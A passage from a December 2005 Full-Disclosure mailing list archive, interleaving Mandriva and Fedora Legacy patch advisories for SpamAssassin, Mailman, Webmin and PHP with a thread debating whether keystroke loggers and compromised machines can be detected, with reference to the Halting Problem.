- Updated spamassassin packages fixes vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2005:221 http://www.mandriva.com/security/ _______________________________________________________________________ Package : spamassassin Date : December 2, 2005 Affected: 10.1, 10.2, 2006.0 _______________________________________________________________________ Problem Description: SpamAssassin 3.0.4 allows attackers to bypass spam detection via an e-mail with a large number of recipients ("To" addresses), which triggers a bus error in Perl. Updated packages have been patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3351 _______________________________________________________________________ Updated Packages: Mandriva Linux 10.1: bef6bc710a84e631fdd4d4f94a86248c 10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.i586.rpm 6c3246d2e9860379b267593fbdd2be74 10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.i586.rpm 75171a7044be3d193e2f9979fd991e62 10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.i586.rpm 20f74aae0c01c0819fc0d686a2967979 10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.i586.rpm 095c5d7c16b74e4004bf731c427c9b0f 10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.i586.rpm c605bdcc9ac46522efaeca7e12c80949 10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm Mandriva Linux 10.1/X86_64: 18805a860661de486a7ae0a716823da2 x86_64/10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.x86_64.rpm 3fd255f3e04fc2b4380063a9b4ca7403 x86_64/10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.x86_64.rpm 208127aaeb59bb39b9711b4e260fd47c x86_64/10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.x86_64.rpm 21c05e1003d08a3a9b869971d713c6a7 x86_64/10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.x86_64.rpm 086b1cb83ee2f4343116bbece2b37261 x86_64/10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.x86_64.rpm c605bdcc9ac46522efaeca7e12c80949 x86_64/10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm Mandriva Linux 10.2: cc43a9f882ef5a1e20d587d961db8d1a 10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.i586.rpm a42113eae2989be9d3af932338535c5d 10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.i586.rpm f294a8ebb83ec6245ee4cb477f01510a 10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.i586.rpm d017ebbbe4778c147dcc9903473aa092 10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.i586.rpm bb699d1b5875a53b5daace54ef544d20 10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.i586.rpm eec76ea982c797aaa1b18f6b1c35471c 10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm Mandriva Linux 10.2/X86_64: dccacca323368a74af5af12392e1486c x86_64/10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.x86_64.rpm d104a1c344b1616a881e29e8b4cb495c x86_64/10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.x86_64.rpm 410ce462bf261c2e1c73cff6eefa4517 x86_64/10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.x86_64.rpm b8c5daaf23e58bcf8d344178a6d28b72 x86_64/10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.x86_64.rpm 04bf196106dfc274c726e9be8bf293ce x86_64/10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.x86_64.rpm eec76ea982c797aaa1b18f6b1c35471c x86_64/10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm Mandriva Linux 2006.0: a4f918d6bf1ca8fedc56537d17a63269 2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.i586.rpm 51c25677480258fb2d314bafb0f9dfa8 2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.i586.rpm b30bf3189682f28947ede6cc32c23cfe 2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.i586.rpm af129cafa8c0afacf47848248e2a093f 2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.i586.rpm e5c6baedbbb98c975cfdbcfbddf50940 2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.i586.rpm 4b6ae867e1bcfc10a29fc13b04d9a1a6 2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: d76d8b497ef31d06b89a3ff3a6c1fbd9 x86_64/2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.x86_64.rpm 29b0e1af99bc43c46c3d53b4c9e1ca1d x86_64/2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.x86_64.rpm f8239556e3a60e290a51d70ccdc3fc48 x86_64/2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.x86_64.rpm 0f2ac7444f0878e2c6d001d8c52a6bfd x86_64/2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.x86_64.rpm d6770761031d62efcd536f0d087a0f40 x86_64/2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.x86_64.rpm 4b6ae867e1bcfc10a29fc13b04d9a1a6 x86_64/2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDkJ/OmqjQ0CJFipgRAro1AKCPiqdJthd1mtamPh2eo1QjrW/aVACgkYRz tAXCd0pIduEE0FVaW6AxK2M= =Lwz7 -----END PGP SIGNATURE----- From jan at boyakasha.dk Fri Dec 2 22:37:09 2005 From: jan at boyakasha.dk (Jan Nielsen) Date: Fri, 2 Dec 2005 23:37:09 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <4391772D.19582.3154FA99@gmail.com> Message-ID: <000a01c5f790$f2f0b620$c864a8c0@dopehead> > That question opens up a whole lotta other questions, really depends on > what you hope to achieve by doing authentication via a compromised system. > In my book you should instead try to detect a compromised system and deny > them access if they are indeed compromised, ... >Obviously, then, your book does not include the phrase "Halting >Problem"... Sorry, I don't follow you there, you mean that the scan would halt the system ? fair enough, I don't think any method of scanning a target is fool-proof, no matter how its done. > ... that would be in the end-users > best interest I think (and of course report your findings to the users > mailbox or something, don't tell the hacker that you detected his > keylogger :-) >And what machines do you think users are most likely to check their >mail from? Thanks for pointing that out, but you would wan't to somehow relay to the person not gaining access, why they are not getting in though, a textmessage/SMS might be wiser. >And, of course, your suggestion raises a primacy issue -- if you >actually did detect the user's machine was compromised before they >logged in and thus prevented allowing the login by not allowing the >login dialog to be displayed or somesuch (thereby saving the user >compromising yet more of their data), how in the heck do you know where >to send the warning mail? >Hmmmmm... Methinks you should think more before responding. Again, somehow they need to know, i don't have any ideas that can't be intercepted on a compromised system, other than SMS/textmessage or something. Regards, Jan >Regards, >Nick FitzGerald From security at mandriva.com Fri Dec 2 22:43:01 2005 From: security at mandriva.com (Mandriva Security Team) Date: Fri, 02 Dec 2005 15:43:01 -0700 Subject: [Full-disclosure] MDKSA-2005:222 - Updated mailman packages fix various vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2005:222 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mailman Date : December 2, 2005 Affected: 10.1, 10.2, 2006.0, Corporate 3.0 _______________________________________________________________________ Problem Description: Scrubber.py in Mailman 2.1.4 - 2.1.6 does not properly handle UTF8 character encodings in filenames of e-mail attachments, which allows remote attackers to cause a denial of service. (CVE-2005-3573) In addition, these versions of mailman have an issue where the server will fail with an Overflow on bad date data in a processed message. The version of mailman in Corporate Server 2.1 does not contain the above vulnerable code. Updated packages are patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3573 _______________________________________________________________________ Updated Packages: Mandriva Linux 10.1: b62f2bdad4a9295bcedec597f5479843 10.1/RPMS/mailman-2.1.5-7.5.101mdk.i586.rpm 4ebd694b50ccbc9f2b602676840c4bc9 10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm Mandriva Linux 10.1/X86_64: a887edf3dd65a418c441fae7588f7e5e x86_64/10.1/RPMS/mailman-2.1.5-7.5.101mdk.x86_64.rpm 4ebd694b50ccbc9f2b602676840c4bc9 x86_64/10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm Mandriva Linux 10.2: 99e3dbde709dfa5eb7bd71041adf41be 10.2/RPMS/mailman-2.1.5-15.2.102mdk.i586.rpm c01867687ff9c78b4c1e2da9d70c4f11 10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm Mandriva Linux 10.2/X86_64: c66dd1916ba0d8ecf8796b1890a064fd x86_64/10.2/RPMS/mailman-2.1.5-15.2.102mdk.x86_64.rpm c01867687ff9c78b4c1e2da9d70c4f11 x86_64/10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm Mandriva Linux 2006.0: f917270b5334f62843bbdb4a06d12ae0 2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.i586.rpm 15bc0be9373657ac39a9e3956de90801 2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: e92b1dd1ae0bfe3bbc61ba5d6f3b52c3 x86_64/2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.x86_64.rpm 15bc0be9373657ac39a9e3956de90801 x86_64/2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm Corporate 3.0: 867bdc1fe018e94eb4d5352fc69747ae corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.i586.rpm 572477eb207dadbabc22b0e53b0c2b2b corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm Corporate 3.0/X86_64: 8a4cc67f45481e9d4b25c41e80f54809 x86_64/corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.x86_64.rpm 572477eb207dadbabc22b0e53b0c2b2b x86_64/corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDkKPamqjQ0CJFipgRAli4AKCLkrxtdpNyvYclD5KxuVVAZFAHCgCgw0NO Uq5wc0mG0ABsi0Kyn7l6xR0= =e/3r -----END PGP SIGNATURE----- From ascii at katamail.com Fri Dec 2 22:44:52 2005 From: ascii at katamail.com (ascii) Date: Fri, 02 Dec 2005 23:44:52 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <20051202180113.99CC9ABB@lists.grok.org.uk> References: <20051202180113.99CC9ABB@lists.grok.org.uk> Message-ID: <4390CE64.50408@katamail.com> Debasis Mohanty wrote: > Average time taken by a user for entering Bank PINs using onscreen keyboards > is 1 - 1.5 mins. > Size of AVI file generated for 1 - 1.5 min of recording > 1 MB > Assuming 10 such recording per day, size > 10 mb yes, avoid avi file : ) i have seen some rbot modules with an hidden vnc server and something like pyvnc2swf (very effective and optimized) on a uber-compromised system (and with fine human surveillance) the only way are fast-expiring out-of-band methods as rodrigob said ascii - http://www.ush.it From foofus at foofus.net Fri Dec 2 22:55:02 2005 From: foofus at foofus.net (foofus at foofus.net) Date: Fri, 2 Dec 2005 16:55:02 -0600 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <4391772D.19582.3154FA99@gmail.com> References: <1133457890.12950.80.camel@localhost> <4391772D.19582.3154FA99@gmail.com> Message-ID: <20051202225501.GA21813@foofus.net> On Sat, Dec 03, 2005 at 10:45:02AM +1300, Nick FitzGerald wrote: > Jan Nielsen wrote: > > > That question opens up a whole lotta other questions, really depends on > > what you hope to achieve by doing authentication via a compromised system. > > In my book you should instead try to detect a compromised system and deny > > them access if they are indeed compromised, ... > > Obviously, then, your book does not include the phrase "Halting > Problem"... Do you just mean that you think this is an undecidable issue, or is there some stronger or more directly applicable lesson to be learned here from the Halting Problem? --Foofus. From security at mandriva.com Fri Dec 2 23:02:01 2005 From: security at mandriva.com (Mandriva Security Team) Date: Fri, 02 Dec 2005 16:02:01 -0700 Subject: [Full-disclosure] MDKSA-2005:223 - Updated webmin package fixes format string vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2005:223 http://www.mandriva.com/security/ _______________________________________________________________________ Package : webmin Date : December 2, 2005 Affected: 10.1, 10.2, 2006.0, Corporate 2.1, Corporate 3.0 _______________________________________________________________________ Problem Description: Jack Louis discovered a format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled. This can allow remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3912 _______________________________________________________________________ Updated Packages: Mandriva Linux 10.1: 1c75e57f72de9b9eb187d18de15d9a0b 10.1/RPMS/webmin-1.150-3.2.101mdk.noarch.rpm fb3f30131577c5e7e799ee58264055aa 10.1/SRPMS/webmin-1.150-3.2.101mdk.src.rpm Mandriva Linux 10.1/X86_64: 39782b6c2fe898596023ad384cd2d5ce x86_64/10.1/RPMS/webmin-1.150-3.2.101mdk.noarch.rpm fb3f30131577c5e7e799ee58264055aa x86_64/10.1/SRPMS/webmin-1.150-3.2.101mdk.src.rpm Mandriva Linux 10.2: 5ff784b1c60b7cc2fbc39487c22b6b78 10.2/RPMS/webmin-1.180-1.2.102mdk.noarch.rpm 060c31856652e82003997150f9403021 10.2/SRPMS/webmin-1.180-1.2.102mdk.src.rpm Mandriva Linux 10.2/X86_64: a268a1aa09cf68c7727aa7f0f479c8ac x86_64/10.2/RPMS/webmin-1.180-1.2.102mdk.noarch.rpm 060c31856652e82003997150f9403021 x86_64/10.2/SRPMS/webmin-1.180-1.2.102mdk.src.rpm Mandriva Linux 2006.0: 25b784d8c69c42f5f816272f47528156 2006.0/RPMS/webmin-1.220-9.2.20060mdk.noarch.rpm 64772a0268b55e2d2650f4c43f4fe0b2 2006.0/SRPMS/webmin-1.220-9.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: bab0f651f140671b4bb01f65b9799de9 x86_64/2006.0/RPMS/webmin-1.220-9.2.20060mdk.noarch.rpm 64772a0268b55e2d2650f4c43f4fe0b2 x86_64/2006.0/SRPMS/webmin-1.220-9.2.20060mdk.src.rpm Corporate Server 2.1: 303bd86b1156ea7ff6d08654fe824707 corporate/2.1/RPMS/webmin-0.990-6.6.C21mdk.noarch.rpm 0141850dc79c0ef041bd077264213dc9 corporate/2.1/SRPMS/webmin-0.990-6.6.C21mdk.src.rpm Corporate Server 2.1/X86_64: 8bb1b1dd0afea4178626fd6d8470b730 x86_64/corporate/2.1/RPMS/webmin-0.990-6.6.C21mdk.noarch.rpm 0141850dc79c0ef041bd077264213dc9 x86_64/corporate/2.1/SRPMS/webmin-0.990-6.6.C21mdk.src.rpm Corporate 3.0: 5826c5c5fea5793c594d4fa46cae6338 corporate/3.0/RPMS/webmin-1.121-4.5.C30mdk.noarch.rpm d38cdd7a15e0340ca4e5aa95e8a5b5ec corporate/3.0/SRPMS/webmin-1.121-4.5.C30mdk.src.rpm Corporate 3.0/X86_64: abd80f852fa1c5628da3613623a1f1c1 x86_64/corporate/3.0/RPMS/webmin-1.121-4.5.C30mdk.noarch.rpm d38cdd7a15e0340ca4e5aa95e8a5b5ec x86_64/corporate/3.0/SRPMS/webmin-1.121-4.5.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDkKSNmqjQ0CJFipgRAv02AJ9jK/zjwWYPUmxU+eLOPHfHcknTDgCg1wxA OjWMSwu8XOcyXiJlYfhP3eI= =fmDq -----END PGP SIGNATURE----- From nick at virus-l.demon.co.uk Fri Dec 2 23:22:17 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Sat, 03 Dec 2005 12:22:17 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <000a01c5f790$f2f0b620$c864a8c0@dopehead> References: <4391772D.19582.3154FA99@gmail.com> Message-ID: <43918DF9.9012.31AE0659@gmail.com> Jan Nielsen to me to Jan: > >Obviously, then, your book does not include the phrase "Halting > >Problem"... > > Sorry, I don't follow you there, you mean that the scan would halt the > system ? fair enough, I don't think any method of scanning a target is > fool-proof, no matter how its done. Ahh, no... http://en.wikipedia.org/wiki/Halting_problem Basically (and simplifying a lot), the Halting Problem means that you cannot write a computer program to determine if some other program exhibits "function X", _in finite time_. Thus, you cannot write a program to detect all viruses, you cannot write a program to detect key loggers, you cannot write a prorgram to detect all spyware, etc, etc. In short, the Halting Problem means that your suggestion to "beat" the problem of having to run on a compromised system by detecting if the system is compromised is just as impossible as is finding a solution more in line with the OP's suggested (but it turns out, unclearly so) aims. > > ... that would be in the end-users > > best interest I think (and of course report your findings to the users > > mailbox or something, don't tell the hacker that you detected his > > keylogger :-) > > >And what machines do you think users are most likely to check their > >mail from? > > Thanks for pointing that out, but you would wan't to somehow relay to > the person not gaining access, why they are not getting in though, ... It would be _nice_ to do that, but it is an equally fraught problem. After all, even if you could entirely reliably programmatically determine that the users's system was compromised, you cannot trust any response from the system, or that any message you try to send to them to alert them to this will not be intercepted by some warez put on the system as a result of the compromise... > ... a > textmessage/SMS might be wiser. And, as I already pointed out and you seem to have missed (or forgotten already), regardless of whether you try to do such "warning" out-of- band (a good idea on its face) or not, that raises the issue of how do you _reliably_ know who to send the message to that the system has been compromised. You cannot trust that anything returned from the compromised machine will be reliable, and you can't allow the user to perform any kind of "sensitive" authentication (as gaining that information is presumably the aim of the compromiser andd _preventing that_ was the aim of this suggested solution... "Rock?" "Hard place?" "Meet Jan Nielsen..." > >And, of course, your suggestion raises a primacy issue -- if you > >actually did detect the user's machine was compromised before they > >logged in and thus prevented allowing the login by not allowing the > >login dialog to be displayed or somesuch (thereby saving the user > >compromising yet more of their data), how in the heck do you know where > > >to send the warning mail? > > >Hmmmmm... Methinks you should think more before responding. > > Again, somehow they need to know, i don't have any ideas that can't be > intercepted on a compromised system, other than SMS/textmessage or > something. Yes, and while doing the signalling that you have detected their system is compromised out-of-band of the compromise is a genuinely desirable thing, you still have not provided a way to strongly authenticate _who_ to send that message to, regardless of the actual form of OOB signalling used. While you're working that problem you may also want to think about the "chicken and the egg" problem as they are closely related. We look forward to your solutions... Regards, Nick FitzGerald From daniels at Ponderosatel.com Fri Dec 2 23:23:38 2005 From: daniels at Ponderosatel.com (Daniel Sichel) Date: Fri, 2 Dec 2005 15:23:38 -0800 Subject: [Full-disclosure] RE: Keystroke Logger proof softtware Message-ID: <190DFDD2F99A65469B4B15D3658C0D2B01692A61@ptc6.ponderosatel.com> >The goal of the project is to see if we can design a system that prevents an >uneducated user from shooting themselves in the in the foot. Let me save you a lot of time and effort. You can't. Dan S. Ponderosa Telephone From foofus at foofus.net Fri Dec 2 23:39:28 2005 From: foofus at foofus.net (foofus at foofus.net) Date: Fri, 2 Dec 2005 17:39:28 -0600 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <43918DF9.9012.31AE0659@gmail.com> References: <4391772D.19582.3154FA99@gmail.com> <43918DF9.9012.31AE0659@gmail.com> Message-ID: <20051202233928.GB21813@foofus.net> On Sat, Dec 03, 2005 at 12:22:17PM +1300, Nick FitzGerald wrote: > Ahh, no... > > http://en.wikipedia.org/wiki/Halting_problem > > Basically (and simplifying a lot), the Halting Problem means that you > cannot write a computer program to determine if some other program > exhibits "function X", _in finite time_. I don't think this is what the Halting Problem means. My understanding is that it means you can't write a program to determine if *any* other program exhibits "function X", in finite time. For a particular program, however, this may be quite feasible. > Thus, you cannot write a > program to detect all viruses, you cannot write a program to detect key > loggers, you cannot write a prorgram to detect all spyware, etc, etc. How do you know that the problem of detecting all keystroke loggers is equivalent to the Halting Program? Is there a proof somewhere that keystroke loggers do not share some characteristic that makes them detectable? <-- I am not being sarcastic; this is an earnest question. My formal CS background is weak, but I don't think the problem of programmatically detecting compromised machines of a given OS (not the general case of "compromised machines of any sort) has been proven to be undecidable in the strong way that the Halting Problem has. I may be wrong, though, which is why I ask. --Foofus. From jan at boyakasha.dk Sat Dec 3 00:10:51 2005 From: jan at boyakasha.dk (Jan Nielsen) Date: Sat, 3 Dec 2005 01:10:51 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <43918DF9.9012.31AE0659@gmail.com> Message-ID: <000401c5f79e$0e90ef00$c864a8c0@dopehead> -----Original Message----- From: boyakash at cp.goodydomains.com [mailto:boyakash at cp.goodydomains.com] On Behalf Of Nick FitzGerald Sent: 3. december 2005 00:22 To: full-disclosure at lists.grok.org.uk Subject: RE: [Full-disclosure] Most common keystroke loggers? Jan Nielsen to me to Jan: > >Obviously, then, your book does not include the phrase "Halting > >Problem"... > > Sorry, I don't follow you there, you mean that the scan would halt the > system ? fair enough, I don't think any method of scanning a target is > fool-proof, no matter how its done. >Ahh, no... > http://en.wikipedia.org/wiki/Halting_problem Good to know, i did not know that this dilemma had a name :-) >It would be _nice_ to do that, but it is an equally fraught problem. >After all, even if you could entirely reliably programmatically >determine that the users's system was compromised, you cannot trust any >response from the system, or that any message you try to send to them >to alert them to this will not be intercepted by some warez put on the >system as a result of the compromise... Good point, I guess I am glad I am not trying to design this system. > ... a > textmessage/SMS might be wiser. From nick at virus-l.demon.co.uk Sat Dec 3 00:15:26 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Sat, 03 Dec 2005 13:15:26 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <200512020804.50762.lionel.ferette@belnet.be> References: <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> Message-ID: <43919A6E.27476.31DEAD3F@gmail.com> Lionel Ferette wrote: > > Using crypto all the way from the web server to a smart-card (so all the > > compromised system can see is encrypted data it can't get the key for) can > > help yere. > Even then, you would need a card reader with integrated pinpad. Otherwise, the > keylogger can still sniff the PIN code entry - and then generate any > signature it wants by accessing the PC/SC layer directly (been there, done > that). I'm not entirely convinced of that. _Some part_ of displaying the transactions and accepting/rejecting the transactions has to occur "securely" (off the compromised machine), but I don't think it necessarily has to be the stage you suggest... Regards, Nick FitzGerald From nick at virus-l.demon.co.uk Sat Dec 3 01:12:32 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Sat, 03 Dec 2005 14:12:32 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <20051202233928.GB21813@foofus.net> References: <43918DF9.9012.31AE0659@gmail.com> Message-ID: <4391A7D0.28815.3212F664@gmail.com> foofus at foofus.net to me to Jan: > > Basically (and simplifying a lot), the Halting Problem means that you > > cannot write a computer program to determine if some other program > > exhibits "function X", _in finite time_. > > I don't think this is what the Halting Problem means. My understanding > is that it means you can't write a program to determine if *any* other > program exhibits "function X", in finite time. For a particular > program, however, this may be quite feasible. But we were not talking about a "particular program" (other than in the bizarre sense that you consider the whole set of programs that makes up an entire OS and its application suite "a program"). Jan was suggesting "compromise detection" in lieu of an approach that could overcome the problems presented by a compromised system. Thus, Jan's suggestion was for a _general_ compromise detection system (and that would effectively be so even if the solution space were to be limited to one contemporary OS as all such systems are so large and complex). > > Thus, you cannot write a > > program to detect all viruses, you cannot write a program to detect key > > loggers, you cannot write a prorgram to detect all spyware, etc, etc. > > How do you know that the problem of detecting all keystroke loggers is > equivalent to the Halting Program? Is there a proof somewhere that > keystroke loggers do not share some characteristic that makes them > detectable? <-- I am not being sarcastic; this is an earnest question. "Proof" -- no, but it seems it should follow from the general proof. My maths is not up to proving that though, but by analogy, it seems to me to be quite the same issue as Cohen's Ph.D. thesis proof that virus detection in general reduces to the Halting Problem (that is NOT the same thinkg as "known virus detection", which is what current AV products provide and why they need incessant updating to remain barely marginally useful). > My formal CS background is weak, but I don't think the problem of > programmatically detecting compromised machines of a given OS (not > the general case of "compromised machines of any sort) ... Actually, I don't think that helps you -- read the parts of the Wikipedia entry that talk about partial solutions... The Halting Problem is a very powerful result in computability theory. > ... has been proven > to be undecidable in the strong way that the Halting Problem has. I may > be wrong, though, which is why I ask. Likewise, I do not have the formal background to make that proof, but I'd be very surprised if that were not the case... Regards, Nick FitzGerald From marcdeslauriers at videotron.ca Sat Dec 3 01:31:16 2005 From: marcdeslauriers at videotron.ca (Marc Deslauriers) Date: Fri, 02 Dec 2005 20:31:16 -0500 Subject: [Full-disclosure] [Updated] [FLSA-2005:166943] Updated php packages fix security issues Message-ID: <4390F564.2090603@videotron.ca> --------------------------------------------------------------------- Fedora Legacy Update Advisory Synopsis: Updated php packages fix security issues Advisory ID: FLSA:166943 Issue date: 2005-12-02 Product: Red Hat Linux, Fedora Core Keywords: Bugfix CVE Names: CVE-2005-2498 CVE-2005-3390 CVE-2005-3389 CVE-2005-3388 CVE-2005-3353 --------------------------------------------------------------------- --------------------------------------------------------------------- 1. Topic: Updated PHP packages that fix multiple security issues are now available. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. [Updated 2nd December 2005] Red Hat Linux 9 packages have been updated to add missing security patches. 2. Relevant releases/architectures: Red Hat Linux 7.3 - i386 Red Hat Linux 9 - i386 Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: A bug was discovered in the PEAR XML-RPC Server package included in PHP. If a PHP script is used which implements an XML-RPC Server using the PEAR XML-RPC package, then it is possible for a remote attacker to construct an XML-RPC request which can cause PHP to execute arbitrary PHP commands as the 'apache' user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2498 to this issue. A flaw was found in the way PHP registers global variables during a file upload request. A remote attacker could submit a carefully crafted multipart/form-data POST request that would overwrite the $GLOBALS array, altering expected script behavior, and possibly leading to the execution of arbitrary PHP commands. Please note that this vulnerability only affects installations which have register_globals enabled in the PHP configuration file, which is not a default or recommended option. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-3390 to this issue. A flaw was found in the PHP parse_str() function. If a PHP script passes only one argument to the parse_str() function, and the script can be forced to abort execution during operation (for example due to the memory_limit setting), the register_globals may be enabled even if it is disabled in the PHP configuration file. This vulnerability only affects installations that have PHP scripts using the parse_str function in this way. (CVE-2005-3389) A Cross-Site Scripting flaw was found in the phpinfo() function. If a victim can be tricked into following a malicious URL to a site with a page displaying the phpinfo() output, it may be possible to inject javascript or HTML content into the displayed page or steal data such as cookies. This vulnerability only affects installations which allow users to view the output of the phpinfo() function. As the phpinfo() function outputs a large amount of information about the current state of PHP, it should only be used during debugging or if protected by authentication. (CVE-2005-3388) A denial of service flaw was found in the way PHP processes EXIF image data. It is possible for an attacker to cause PHP to crash by supplying carefully crafted EXIF image data. (CVE-2005-3353) Users of PHP should upgrade to these updated packages, which contain backported patches that resolve these issues. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=166943 6. RPMs required: Red Hat Linux 7.3: SRPM: http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/php-4.1.2-7.3.18.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-4.1.2-7.3.18.legacy.i386.rpm 